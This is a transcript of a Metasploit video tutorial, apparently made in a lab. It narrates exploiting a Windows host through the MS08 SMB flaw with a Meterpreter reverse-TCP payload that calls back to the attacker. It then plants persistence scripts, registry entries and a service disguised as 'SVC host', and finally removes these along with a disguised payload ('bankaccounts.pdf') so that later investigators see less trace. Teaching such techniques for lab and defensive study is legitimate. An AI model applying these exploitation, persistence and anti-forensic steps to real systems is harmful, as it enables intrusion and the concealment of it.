Okay, so in this video we actually have a few things that we're going to cover, so maybe a little bit lengthy, but what I hope to show you is how to clean up the system. Basically, the system that we've been exploiting, we've ran persistence mode, which creates Visual Basic scripts that can be flagged by the antivirus. We've created services. There's files on the other system, so I'm going to show you how to clean that up, how to remove it, how to delete registry keys, the services that we added, which were placed into the registry. How do we kind of clean it all up if we're completely done with this system and we want to try to clean it up? Maybe we got everything that we wanted to, and we kind of want to leave with as least of a trace as possible, so that it's just much more cleaner. We want, if somebody looked later, they might not notice as much as if we left everything on the system. So that's one thing that I want to point out in this video. The second thing that we're going to do is we're going to be talking about resources. When I say resources, I mean resource scripts or modules. We're going to look at how to create a module or resource script and how to run it inside of Metasploit so that it can automate a lot of the tasks for us. Now there's two different types of scripts that we can do. The first type of scripts that we can do would be just like here in Metasploit. What would we first do? We don't have a Meterpreter session, we don't have anything, so what would we do? The scripts that we would make after that would be focused for Meterpreter. We would make Meterpreter specific scripts, things that we could load inside of Meterpreter. So those are a couple different things that I want to touch on. So I guess what we're going to go ahead and do is I'm going to go ahead and exploit our system, and then we're going to try and maybe use a few persistence exploits or services to set up, and so that creates a whole bunch of nasty VBS scripts on there and everything, and then I'm going to show you how to unload that. So let's just start from there. I'm going to go ahead and use exploit Windows SMB MS08. I'm going to go ahead and set my payload Windows Meterpreter. Wait for it here. There we go. Reverse TCP. Let's show options. I'm going to set my R host 192.168.1.106 and set the L host 192.168.1.101. There we go. Okay. Show options. Everything looks good. Let's go ahead and exploit the system. Okay, now that we have our Meterpreter session, what I'm going to do is just purposely run a few persistence services and try and generate just some stuff that would be really noisy. So, for example, we can do a run persistence like we did in the previous video. We'll do a capital A, we'll do a capital L, just like we did with C:, whack whack. I think that needs to be a capital X there. I will do every 10 seconds. Port. Okay, so what I'm going to do is I'm going to go ahead and do this a couple of times here. Let's run this. Hopefully that creates the Visual Basic script. Looks like it's working. It went ahead and put that into the registry. So now I'm going to go ahead and just hit the up arrow, and I'm going to do it again. Actually, let's see here. I don't know if that's going to work because it came up with that other pop-up there. Since it every 10 seconds it's going to call back to us, so we're going to grab these Meterpreter sessions. But okay, so it did it again. So sweet. There's two, and let's do one more. Just one more. See that? We caught another Meterpreter session. It's getting out of control. Alright, so I'm going to go ahead and stop it there. I'm going to hit enter just one time. There we go. and it may keep grabbing sessions. We've got 4 open now, so we need to clean this up. If we went ahead and turned on the antivirus, it would start flagging all kinds of stuff. It'd be really nasty. So one thing that this does is it actually creates a script for us so that we can clean things up. And you'll notice that there's a resource file for cleanup created in root.msf4. Whenever you see this dot and a folder after that, the dot usually indicates that it's a hidden folder. So if we went to our root directory and just looked for this, we're not going to find it. So we need to know specifically what it is, and then we can go into that folder. So we're going to remember it's going to be in MSF4 logs persistence, and then it's going to create folders in there. So let's go ahead and take a look at that. And we'll notice that each one of those, it did that. It created its own registry items and also has its own cleanup scripts. So let's just go ahead and do resource, and what we can do is we need to point to the right place. So for example, let's do /root msf, need to do a .msf4. I think it's on local or logs persistence, and it automatically comes to, I use tab and it automatically comes to these folders. I'm going to hit tab twice, and we can see, kind of have to decipher it here, but this is one folder. These are not files, these are actually folders. So we have 1, 2, 3, 4, 5. So because we've done it a couple times before, we did it 3 times in this video so far, we have a couple extra ones. So I'm just going to start with the first one, which is .1629. So 115, it looks like it stopped at 11. So 115, let me hit tab again, and it takes me to the dot, so 16, and I'll do another tab. And this is the actual file. So it's loaded into the folder and then into the resource script. So let's go ahead and run that. And what it looks like, it tried to delete registry keys and all sort of thing, but it looks like the files have already been deleted. I may have done that before. So we're just going to cycle through each one of these. I'm going to go back to persistence, hit tab 11. So the second one is going to be 115. I may have already deleted this one too, but we'll just cycle through them. 25, hit tab. Let's go ahead and run that. Okay, let's go to the next one. We're just going to keep doing this here. The next one would be 116.48. So let's run that. And there we go. We can see that this one was successful because it actually existed. So it read the script. It removed the Visual Basic script that it put in the C drive. It killed the process that was running it, and it deleted the registry key or the entry that was inside of the registry location. So let's do it a couple more times here. We would be on the third one now. So there's 1, 2. I think we'd be on the fourth one. Yeah, 116 and then 49. 49. There we go. Just run that, clean that up, and then as you can see, that one worked as well. And last one. Which looks like a 116 and 4933. 4933. And it deleted that. So awesome. It's deleted all of the Visual Basic scripts that we put on there, all of the registry keys except for the ones that we did manually. If you go back before the persistence setup that we did it through the command prompt, and that's a little bit more stealthy because we're not creating those Visual Basic scripts. So what we're going to go ahead and do now is we're going to drop into a shell, and obviously we would need to remember the name of the service that we created. The name of the service that we created was SVC host. So what we would do to clean this up is we can do an SC. Now if the service was running, we would need to do a net stop. So if I do a net stop, which is probably not running, SVC host, it says that look at that, it actually gives us the display name. Remember I put that 0 in there? It actually shows the display name as well. But it says it's not started. So it's not started. We should be able to delete this. And obviously we could look at our current privileges and make sure that we had the privileges to do so, which I know that we already do. So what I'm going to do is an SC and then delete. And then the name of the service, SVC host. And it deleted the service. It doesn't show us the registry keys or anything like that, but when we created the service, it made entries into the registry. So when we delete it, it's also going to delete those out of the registry. So other than that, if there's any other files like payloads or anything that we've put on here, let's go ahead and do a CD / to get to the C drive. We can do a dir and take a look at what's in there. For example, we have a bankaccounts.pdf. That's one of our payloads. That was the malicious payload that we used. Well, we can delete that. So we can just do a del bankaccounts.pdf. Let's do a dir, and we can see that it's gone. So there's another example of how you would just remove payloads that you knew were in specific locations. They weren't necessarily started up as a service or anything like that. So those are just a couple little tips that I can share with you, at least using the command prompt and using the resource scripts. The next video we're going to go ahead and talk about how to actually create the resource scripts to do a lot of the work for us, like I mentioned earlier in the video. So I will see you in the next one.